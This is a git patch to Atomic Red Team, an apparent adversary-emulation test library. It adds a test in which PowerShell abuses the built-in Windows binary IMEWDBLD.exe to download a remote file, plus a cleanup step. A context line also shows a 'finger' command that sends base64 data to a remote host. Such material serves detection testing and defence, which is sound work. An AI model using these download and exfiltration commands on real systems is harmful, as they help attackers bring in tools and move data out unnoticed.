From 6d46517d6fd9e0a88fc1cdac40688705e4e20aee Mon Sep 17 00:00:00 2001
From: Brian Thacker <neillthacker101@gmail.com>
Date: Thu, 9 Sep 2021 13:02:26 -0500
Subject: [PATCH] T1105 add test download with imewdbld (#1621)

* Add test "Download a file with IMEWDBLD.exe"

IMEWDBLD.exe can be used to download files from third party websites. This will throw an error for an invalid dictionary but the file will still be downloaded.
Commands to execute this activity and cleanup commands added.
Cleanup commands call on cmd.exe because PowerShell by default would not remove those files.
Disclosed by https://twitter.com/notwhickey
https://twitter.com/notwhickey/status/136749340683504026

* Update T1105.yaml

fixed typo test 17

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1105/T1105.yaml | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)

diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index a389073e..8652af08 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -414,3 +414,28 @@ atomic_tests:
     name: command_prompt
     command: |
       finger base64_filedata@#{remote_host}
+- name: Download a file with IMEWDBLD.exe
+  description: |
+    Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file.
+    Downloaded files can be found in "%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>" or `%LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>.
+    Run "Get-ChildItem -Path C:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\INetCache\ -Include <FILENAME>* -Recurse -Force -File -ErrorAction SilentlyContinue" without quotes and adding the correct username and file name to locate the file.
+  supported_platforms:
+  - windows
+  input_arguments:
+    remote_url:
+      description: Location of file to be downloaded.
+      type: url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml
+    file_name:
+      description: Name of the file to be downloaded without extension.
+      type: string
+      default: T1105
+  executor:
+    command: |
+      $imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe"
+      & $imewdbled #{remote_url}
+    cleanup_command: |
+      $inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\" 
+      $file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
+      cmd.exe /c "del $file_to_be_removed"
+    name: powershell